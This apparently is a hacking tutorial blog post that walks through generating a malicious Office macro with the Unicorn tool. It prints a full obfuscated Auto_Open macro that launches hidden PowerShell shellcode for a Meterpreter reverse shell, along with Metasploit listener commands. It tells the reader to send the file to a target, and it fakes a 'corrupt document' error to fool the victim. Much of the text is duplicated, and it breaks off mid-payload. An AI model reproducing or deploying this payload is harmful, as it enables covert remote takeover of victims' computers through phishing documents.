Hey Guys wazzup.
Today is the first part of my Microsoft Meterpreter Macro's series.
The First tool to pwn Microsoft office is Unicorn.
Today is the first part of my Microsoft Meterpreter Macro's series.
The First tool to pwn Microsoft office is Unicorn.
Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented
by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
To run this tool you need python2 on your system.(Don't install it
by using apt-get install unicorn this is an entirely different tool!)
instead of this git clone it by git clone https://github.com/trustedsec/unicorn.git
and move to the directonary with:unicorn
run it by the command python unicorn.py
or chmod +x unicorn.py; ./unicorn.py
You will see this:
Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates
Happy Magic Unicorns.
Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
PS Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443
Macro Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro
HTA Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 hta
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Help Menu: python unicorn.py --help
and a quite cool ASCII picture of a unicorn :)
by using apt-get install unicorn this is an entirely different tool!)
instead of this git clone it by git clone https://github.com/trustedsec/unicorn.git
and move to the directonary with:unicorn
run it by the command python unicorn.py
or chmod +x unicorn.py; ./unicorn.py
You will see this:
Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates
Happy Magic Unicorns.
Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
PS Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443
Macro Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro
HTA Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 hta
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Help Menu: python unicorn.py --help
and a quite cool ASCII picture of a unicorn :)
To actually generate the macro type:
python unicorn.py windows/meterpreter/reverse_tcp 192.168.x.x 443 macro
After that you will see this:
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Happy Magic Unicorns.
[************************************************************]
-----MACRO ATTACK INSTRUCTIONS----
For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you do
that, you will have a developer tab. Create a new macro, call it Auto_Open and paste the generated code
into that. This will automatically run. Note that a message will prompt to the user saying that the file
is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the
victim to thinking the excel document is corrupted. You should get a shell through powershell injection
after that.
NOTE: WHEN COPYING AND PASTING THE EXCEL, IF THERE ARE ADDITIONAL SPACES THAT ARE ADDED YOU NEED TO
REMOVE THESE AFTER EACH OF THE POWERSHELL CODE SECTIONS UNDER VARIABLE "x" OR A SYNTAX ERROR WILL
HAPPEN!
[*****************************************************************]
[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener
Okay great first of all open up a new terminal and start a listener by typing:
msfconsole -r unicorn.rc
(the same as: msfconsole, use multi/handler, set payload windows/meterpreter/reverse_tcp, set LHOST 192.168.x.x, set LPORT 443, exploit -j )
Than switch back to your unicorn window and type: cat powershell_attack.txt
(This will print out the actual macro code we're going to use)
The output is something like this:
Sub Auto_Open()
Dim x
x = "powershell -window hidden -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrA
GUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQ
AaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQ
QBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQB
pAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAH
QAaQBvAG4AVAB5A" _
& "HAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABs
AEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHU
AYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQA
cgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVAB
oAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwB
TAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAU" _
& "wB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQB
yAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAG
wAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsA
WwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQB
wAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQA
HQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkA" _
& "GUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAH
QAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQ
ByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAD
MAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAH
QAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsA
WwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAM" _
& "AB4ADUANQAsADAAeAA2ADYALAAwAHgANABjACwAMAB4AGMAMQAsADAAeABkAGIA
LAAwAHgAZABkACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGY
ANAAsADAAeAA1AGEALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHg
ANAA3ACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4ADMAMQAsADA
AeAA3ADIALAAwAHgAMABmACwAMAB4ADAAMwAsADAAeAA3ADIALAAwAHgANQBhACw
AMAB4ADgANAAsADAAeABiADkALAAwAHgAMwBkACwAMAB4ADgAYwAsADAAeABjA" _
& "GEALAAwAHgANAAyACwAMAB4AGIAZQAsADAAeAA0AGMALAAwAHgAYQBiACwAMAB4A
GMAYgAsADAAeAA1AGIALAAwAHgANwBkACwAMAB4AGUAYgAsADAAeABhADgALAAwAH
gAMgA4ACwAMAB4ADIAZAAsADAAeABkAGIALAAwAHgAYgBiACwAMAB4ADcAZAAsADAAe
ABjADEALAAwAHgAOQAwACwAMAB4AGUAZQAsADAAeAA5ADUALAAwAHgANQAyACwAM
AB4AGQANAAsADAAeAAyADYALAAwAHgAOQA5ACwAMAB4AGQAMwAsADAAeAA1ADMAL
AAwAHgAMQAxACwAMAB4ADkANAAsADAAeABlADQALAAwAHgAYwA4ACwAM" _
& "AB4ADYAMQAsADAAeABiADcALAAwAHgANgA2ACwAMAB4ADEAMwAsADAAeABiADYALAA
wAHgAMQA3ACwAMAB4ADUANwAsADAAeABkAGMALAAwAHgAYwBiACwAMAB4ADUANg
AsADAAeAA5ADAALAAwAHgAMAAxACwAMAB4ADIAMQAsADAAeAAwAGEALAAwAHgANAA
5ACwAMAB4ADQAZAAsADAAeAA5ADQALAAwAHgAYgBiACwAMAB4AGYAZQAsADAAeAAxA
GIALAAwAHgAMgA1ACwAMAB4ADMANwAsADAAeAA0AGMALAAwAHgAOABkACwAMAB4A
DIAZAAsADAAeABhADQALAAwAHgAMAA0ACwAMAB4AGEAYwAsADAAeAAxA" _
& "GMALAAwAHgANwBiACwAMAB4ADEAZgAsADAAeABmADcALAAwAHgAYgBlACwAMAB4A
DcAZAAsADAAeABjAGMALAAwAHgAOAAzACwAMAB4AGYANgAsADAAeAA2ADUALAAwAH
gAMQAxACwAMAB4AGEAOQAsADAAeAA0ADEALAAwAHgAMQBkACwAMAB4AGUAMQAs
ADAAeAA0ADUALAAwAHgANQAwACwAMAB4AGYANwAsADAAeAAzADgALAAwAHgAYQA
1ACwAMAB4AGYAZgAsADAAeAAzADYALAAwAHgAZgA1ACwAMAB4ADUANAAsADAAeAAw
ADEALAAwAHgANwBlACwAMAB4ADMAMQAsADAAeAA4ADcALAAwAHgANwA0ACwAM" _
& "AB4ADcANgAsADAAeAA0ADIALAAwAHgAMwBhACwAMAB4ADgAZgAsADAAeAA0AGQAL
AAwAHgAMwA5ACwAMAB4AGUAMAAsADAAeAAxAGEALAAwAHgANQA2ACwAMAB4ADkA
OQAsADAAeAA2ADMALAAwAHgAYgBjACwAMAB4AGIAMgAsADAAeAAxADgALAAwAHgAY
QA3ACwAMAB4ADUAYgAsADAAeAAzADAALAAwAHgAMQA2ACwAMAB4ADAAYwAsADAAe
AAyAGYALAAwAHgAMQBlACwAMAB4ADMAYQAsADAAeAA5ADMALAAwAHgAZgBjACwAMA
B4ADEANAAsADAAeAA0ADYALAAwAHgAMQA4ACwAMAB4ADAAMwAsADAAeABmA" _
& "GIALAAwAHgAYwBmACwAMAB4ADUAYQAsADAAeAAyADAALAAwAHgAZABmACwAMAB
4ADkANAAsADAAeAAzADkALAAwAHgANAA5ACwAMAB4ADQANgAsADAAeAA3ADAALAAw
AHgAZQBmACwAMAB4ADcANgAsADAAeAA5ADgALAAwAHgAZABiACwAMAB4ADUAMAAsA
DAAeABkADMALAAwAHgAZAAyACwAMAB4AGYAMQAsADAAeAA4ADUALAAwAHgANgBlA
CwAMAB4AGIAOQAsADAAeAA5AGQALAAwAHgANgBhACwAMAB4ADQAMwAsADAAeAA0
ADIALAAwAHgANQBkACwAMAB4AGUANQAsADAAeABkADQALAAwAHgAMwAxACwAM" _
& "AB4ADYAZgAsADAAeABhAGEALAAwAHgANABlACwAMAB4AGQAZQAsADAAeABjADMALA
AwAHgAMgAzACwAMAB4ADQAOQAsADAAeAAxADkALAAwAHgAMgA0ACwAMAB4ADEAZQ
AsADAAeAAyAGQALAAwAHgAYgA1ACwAMAB4AGQAYgAsADAAeABhADEALAAwAHgANABl
ACwAMAB4ADkAZgAsADAAeAAxAGYALAAwAHgAZgA1ACwAMAB4ADEAZQAsADAAeABiADc
ALAAwAHgAYgA2ACwAMAB4ADcANgAsADAAeABmADUALAAwAHgANAA3ACwAMAB4ADM
ANwAsADAAeABhADMALAAwAHgANQBhACwAMAB4ADEAOAAsADAAeAA5A" _
& "DcALAAwAHgAMQBjACwAMAB4ADEAYgAsADAAeABjADgALAAwAHgANQA3ACwAMAB4
AGMAZAAsADAAeABmADMALAAwAHgAMAAyACwAMAB4ADUAOAAsADAAeAAzADIALAAw
AHgAZQAzACwAMAB4ADIAYwAsADAAeABiADMALAAwAHgANQBiACwAMAB4ADgAZQAsA
DAAeABkADcALAAwAHgANQAzACwAMAB4AGEANAAsADAAeABlADcALAAwAHgAZAA5ACw
AMAB4AGIAMwAsADAAeAA0AGMALAAwAHgAZgBhACwAMAB4AGQAOQAsADAAeABiADIA
LAAwAHgAMwA3ACwAMAB4ADcAMwAsADAAeAAzAGYALAAwAHgAZABlACwAM" _
& "AB4ADUANwAsADAAeABkADIALAAwAHgAOQA3ACwAMAB4ADcANgAsADAAeABjADEALA
AwAHgANwBmACwAMAB4ADYAMwAsADAAeABlADcALAAwAHgAMABlACwAMAB4AGEAYQ
AsADAAeAAwADkALAAwAHgAMgA3ACwAMAB4ADgANAAsADAAeAA1ADkALAAwAHgAZQB
kACwAMAB4AGUAOQAsADAAeAA2AGQALAAwAHgAMQA3ACwAMAB4AGYAZAAsADAAeAA
5AGQALAAwAHgAOQBkACwAMAB4ADYAMgAsADAAeAA1AGYALAAwAHgAMABiACwAMAB
4AGEAMQAsADAAeAA1ADgALAAwAHgAYwBhACwAMAB4AGIAMwAsADAAeAAzA" _
& "DcALAAwAHgANgA3ACwAMAB4ADUAZAAsADAAeABlADQALAAwAHgAYQBmACwAMAB4
ADYANQAsADAAeABiADgALAAwAHgAYwAyACwAMAB4ADYAZgAsADAAeAA5ADUALAAwA
HgAZQBmACwAMAB4ADUAOQAsADAAeABiADkALAAwAHgAMAAzACwAMAB4ADUAMAAs
ADAAeAAzADUALAAwAHgAYwA2ACwAMAB4AGMAMwAsADAAeAA1ADAALAAwAHgAYwA1
ACwAMAB4ADkAMAAsADAAeAA4ADkALAAwAHgANQAwACwAMAB4AGEAZAAsADAAeAA0A
DQALAAwAHgAZQBhACwAMAB4ADAAMgAsADAAeABjADgALAAwAHgAOABhACwAM" _
& "AB4ADIANwAsADAAeAAzADcALAAwAHgANAAxACwAMAB4ADEAZgAsADAAeABjADgALAA
wAHgANgBlACwAMAB4ADMANgAsADAAeAA4ADgALAAwAHgAYQAwACwAMAB4ADgAYwA
sADAAeAA2ADEALAAwAHgAZgBlACwAMAB4ADYAZQAsADAAeAA2AGUALAAwAHgANAA0A
CwAMAB4AGYAZQAsADAAeAA1ADMALAAwAHgAYgA5ACwAMAB4AGEAMAAsADAAeAA3A
DQALAAwAHgAYgBhACwAMAB4ADcAOQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7
AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxA" _
& "DAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAeAA9ACQ
AdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADA
ALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0Ab
ABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3
ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAeAAuAFQAbwBJAG
4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAI" _
& "AAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwA
MAAsACQAeAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcg
B0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABl
AG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG
4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0A
OgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkA" _
& "DEAKQApADsAJAAyACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbg
B0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAMwAgAD0AI
AAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAd
wBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwA
dgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJA
AzACAAJAAyACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAb" _
& "wB3AGUAcgBzAGgAZQBsAGwAIAAkADIAIAAkAGUAIgA7AH0A"
Shell ("POWERSHELL.EXE " & x)
Dim title As String
title = "Critical Microsoft Office Error"
Dim msg As String
Dim intResponse As Integer
msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub
Yes it's really long I know :)
After that switch to a windows box and open microsoft word or microsoft exel. Go to the 'view' tab, select the macro's button
and then view macro's
Add a new macro (Just give it the name you want)and press create.
(You can do all this steps in one just Hit alt+F11).
Remove the things your document standard creates and paste in the generated macro code into the editor. Just close the macro editor and do one of the most important steps of this tutorial! Save the file as WhateverYouWant.docm (Macro-Enabled document) or WhateverYouWant.doc (Must be word 97-2003 Document!)
Press save and send your file to your target. Switch back to the system you're running your metasploit listener on.
Bam you got a session and your target box is pwned just by opening a Document!
That was it for today guy's
Happy Hunting :)
@ClaimItToYou
PS if you want to Follow Me or David Kennedy(ReL1k) or trusted sec on twitter here are the links:
*https://twitter.com/hackingdave
*https://twitter.com/trustedsec
*https://twitter.com/ClaimItToYou
python unicorn.py windows/meterpreter/reverse_tcp 192.168.x.x 443 macro
After that you will see this:
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Happy Magic Unicorns.
[************************************************************]
-----MACRO ATTACK INSTRUCTIONS----
For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you do
that, you will have a developer tab. Create a new macro, call it Auto_Open and paste the generated code
into that. This will automatically run. Note that a message will prompt to the user saying that the file
is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the
victim to thinking the excel document is corrupted. You should get a shell through powershell injection
after that.
NOTE: WHEN COPYING AND PASTING THE EXCEL, IF THERE ARE ADDITIONAL SPACES THAT ARE ADDED YOU NEED TO
REMOVE THESE AFTER EACH OF THE POWERSHELL CODE SECTIONS UNDER VARIABLE "x" OR A SYNTAX ERROR WILL
HAPPEN!
[*****************************************************************]
[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener
Okay great first of all open up a new terminal and start a listener by typing:
msfconsole -r unicorn.rc
(the same as: msfconsole, use multi/handler, set payload windows/meterpreter/reverse_tcp, set LHOST 192.168.x.x, set LPORT 443, exploit -j )
Than switch back to your unicorn window and type: cat powershell_attack.txt
(This will print out the actual macro code we're going to use)
The output is something like this:
Sub Auto_Open()
Dim x
x = "powershell -window hidden -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrA
GUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQ
AaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQ
QBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQB
pAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAH
QAaQBvAG4AVAB5A" _
& "HAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABs
AEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHU
AYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQA
cgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVAB
oAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwB
TAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAU" _
& "wB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQB
yAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAG
wAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsA
WwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQB
wAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQA
HQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkA" _
& "GUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAH
QAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQ
ByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAD
MAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAH
QAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsA
WwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAM" _
& "AB4ADUANQAsADAAeAA2ADYALAAwAHgANABjACwAMAB4AGMAMQAsADAAeABkAGIA
LAAwAHgAZABkACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGY
ANAAsADAAeAA1AGEALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHg
ANAA3ACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4ADMAMQAsADA
AeAA3ADIALAAwAHgAMABmACwAMAB4ADAAMwAsADAAeAA3ADIALAAwAHgANQBhACw
AMAB4ADgANAAsADAAeABiADkALAAwAHgAMwBkACwAMAB4ADgAYwAsADAAeABjA" _
& "GEALAAwAHgANAAyACwAMAB4AGIAZQAsADAAeAA0AGMALAAwAHgAYQBiACwAMAB4A
GMAYgAsADAAeAA1AGIALAAwAHgANwBkACwAMAB4AGUAYgAsADAAeABhADgALAAwAH
gAMgA4ACwAMAB4ADIAZAAsADAAeABkAGIALAAwAHgAYgBiACwAMAB4ADcAZAAsADAAe
ABjADEALAAwAHgAOQAwACwAMAB4AGUAZQAsADAAeAA5ADUALAAwAHgANQAyACwAM
AB4AGQANAAsADAAeAAyADYALAAwAHgAOQA5ACwAMAB4AGQAMwAsADAAeAA1ADMAL
AAwAHgAMQAxACwAMAB4ADkANAAsADAAeABlADQALAAwAHgAYwA4ACwAM" _
& "AB4ADYAMQAsADAAeABiADcALAAwAHgANgA2ACwAMAB4ADEAMwAsADAAeABiADYALAA
wAHgAMQA3ACwAMAB4ADUANwAsADAAeABkAGMALAAwAHgAYwBiACwAMAB4ADUANg
AsADAAeAA5ADAALAAwAHgAMAAxACwAMAB4ADIAMQAsADAAeAAwAGEALAAwAHgANAA
5ACwAMAB4ADQAZAAsADAAeAA5ADQALAAwAHgAYgBiACwAMAB4AGYAZQAsADAAeAAxA
GIALAAwAHgAMgA1ACwAMAB4ADMANwAsADAAeAA0AGMALAAwAHgAOABkACwAMAB4A
DIAZAAsADAAeABhADQALAAwAHgAMAA0ACwAMAB4AGEAYwAsADAAeAAxA" _
& "GMALAAwAHgANwBiACwAMAB4ADEAZgAsADAAeABmADcALAAwAHgAYgBlACwAMAB4A
DcAZAAsADAAeABjAGMALAAwAHgAOAAzACwAMAB4AGYANgAsADAAeAA2ADUALAAwAH
gAMQAxACwAMAB4AGEAOQAsADAAeAA0ADEALAAwAHgAMQBkACwAMAB4AGUAMQAs
ADAAeAA0ADUALAAwAHgANQAwACwAMAB4AGYANwAsADAAeAAzADgALAAwAHgAYQA
1ACwAMAB4AGYAZgAsADAAeAAzADYALAAwAHgAZgA1ACwAMAB4ADUANAAsADAAeAAw
ADEALAAwAHgANwBlACwAMAB4ADMAMQAsADAAeAA4ADcALAAwAHgANwA0ACwAM" _
& "AB4ADcANgAsADAAeAA0ADIALAAwAHgAMwBhACwAMAB4ADgAZgAsADAAeAA0AGQAL
AAwAHgAMwA5ACwAMAB4AGUAMAAsADAAeAAxAGEALAAwAHgANQA2ACwAMAB4ADkA
OQAsADAAeAA2ADMALAAwAHgAYgBjACwAMAB4AGIAMgAsADAAeAAxADgALAAwAHgAY
QA3ACwAMAB4ADUAYgAsADAAeAAzADAALAAwAHgAMQA2ACwAMAB4ADAAYwAsADAAe
AAyAGYALAAwAHgAMQBlACwAMAB4ADMAYQAsADAAeAA5ADMALAAwAHgAZgBjACwAMA
B4ADEANAAsADAAeAA0ADYALAAwAHgAMQA4ACwAMAB4ADAAMwAsADAAeABmA" _
& "GIALAAwAHgAYwBmACwAMAB4ADUAYQAsADAAeAAyADAALAAwAHgAZABmACwAMAB
4ADkANAAsADAAeAAzADkALAAwAHgANAA5ACwAMAB4ADQANgAsADAAeAA3ADAALAAw
AHgAZQBmACwAMAB4ADcANgAsADAAeAA5ADgALAAwAHgAZABiACwAMAB4ADUAMAAsA
DAAeABkADMALAAwAHgAZAAyACwAMAB4AGYAMQAsADAAeAA4ADUALAAwAHgANgBlA
CwAMAB4AGIAOQAsADAAeAA5AGQALAAwAHgANgBhACwAMAB4ADQAMwAsADAAeAA0
ADIALAAwAHgANQBkACwAMAB4AGUANQAsADAAeABkADQALAAwAHgAMwAxACwAM" _
& "AB4ADYAZgAsADAAeABhAGEALAAwAHgANABlACwAMAB4AGQAZQAsADAAeABjADMALA
AwAHgAMgAzACwAMAB4ADQAOQAsADAAeAAxADkALAAwAHgAMgA0ACwAMAB4ADEAZQ
AsADAAeAAyAGQALAAwAHgAYgA1ACwAMAB4AGQAYgAsADAAeABhADEALAAwAHgANABl
ACwAMAB4ADkAZgAsADAAeAAxAGYALAAwAHgAZgA1ACwAMAB4ADEAZQAsADAAeABiADc
ALAAwAHgAYgA2ACwAMAB4ADcANgAsADAAeABmADUALAAwAHgANAA3ACwAMAB4ADM
ANwAsADAAeABhADMALAAwAHgANQBhACwAMAB4ADEAOAAsADAAeAA5A" _
& "DcALAAwAHgAMQBjACwAMAB4ADEAYgAsADAAeABjADgALAAwAHgANQA3ACwAMAB4
AGMAZAAsADAAeABmADMALAAwAHgAMAAyACwAMAB4ADUAOAAsADAAeAAzADIALAAw
AHgAZQAzACwAMAB4ADIAYwAsADAAeABiADMALAAwAHgANQBiACwAMAB4ADgAZQAsA
DAAeABkADcALAAwAHgANQAzACwAMAB4AGEANAAsADAAeABlADcALAAwAHgAZAA5ACw
AMAB4AGIAMwAsADAAeAA0AGMALAAwAHgAZgBhACwAMAB4AGQAOQAsADAAeABiADIA
LAAwAHgAMwA3ACwAMAB4ADcAMwAsADAAeAAzAGYALAAwAHgAZABlACwAM" _
& "AB4ADUANwAsADAAeABkADIALAAwAHgAOQA3ACwAMAB4ADcANgAsADAAeABjADEALA
AwAHgANwBmACwAMAB4ADYAMwAsADAAeABlADcALAAwAHgAMABlACwAMAB4AGEAYQ
AsADAAeAAwADkALAAwAHgAMgA3ACwAMAB4ADgANAAsADAAeAA1ADkALAAwAHgAZQB
kACwAMAB4AGUAOQAsADAAeAA2AGQALAAwAHgAMQA3ACwAMAB4AGYAZAAsADAAeAA
5AGQALAAwAHgAOQBkACwAMAB4ADYAMgAsADAAeAA1AGYALAAwAHgAMABiACwAMAB
4AGEAMQAsADAAeAA1ADgALAAwAHgAYwBhACwAMAB4AGIAMwAsADAAeAAzA" _
& "DcALAAwAHgANgA3ACwAMAB4ADUAZAAsADAAeABlADQALAAwAHgAYQBmACwAMAB4
ADYANQAsADAAeABiADgALAAwAHgAYwAyACwAMAB4ADYAZgAsADAAeAA5ADUALAAwA
HgAZQBmACwAMAB4ADUAOQAsADAAeABiADkALAAwAHgAMAAzACwAMAB4ADUAMAAs
ADAAeAAzADUALAAwAHgAYwA2ACwAMAB4AGMAMwAsADAAeAA1ADAALAAwAHgAYwA1
ACwAMAB4ADkAMAAsADAAeAA4ADkALAAwAHgANQAwACwAMAB4AGEAZAAsADAAeAA0A
DQALAAwAHgAZQBhACwAMAB4ADAAMgAsADAAeABjADgALAAwAHgAOABhACwAM" _
& "AB4ADIANwAsADAAeAAzADcALAAwAHgANAAxACwAMAB4ADEAZgAsADAAeABjADgALAA
wAHgANgBlACwAMAB4ADMANgAsADAAeAA4ADgALAAwAHgAYQAwACwAMAB4ADgAYwA
sADAAeAA2ADEALAAwAHgAZgBlACwAMAB4ADYAZQAsADAAeAA2AGUALAAwAHgANAA0A
CwAMAB4AGYAZQAsADAAeAA1ADMALAAwAHgAYgA5ACwAMAB4AGEAMAAsADAAeAA3A
DQALAAwAHgAYgBhACwAMAB4ADcAOQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7
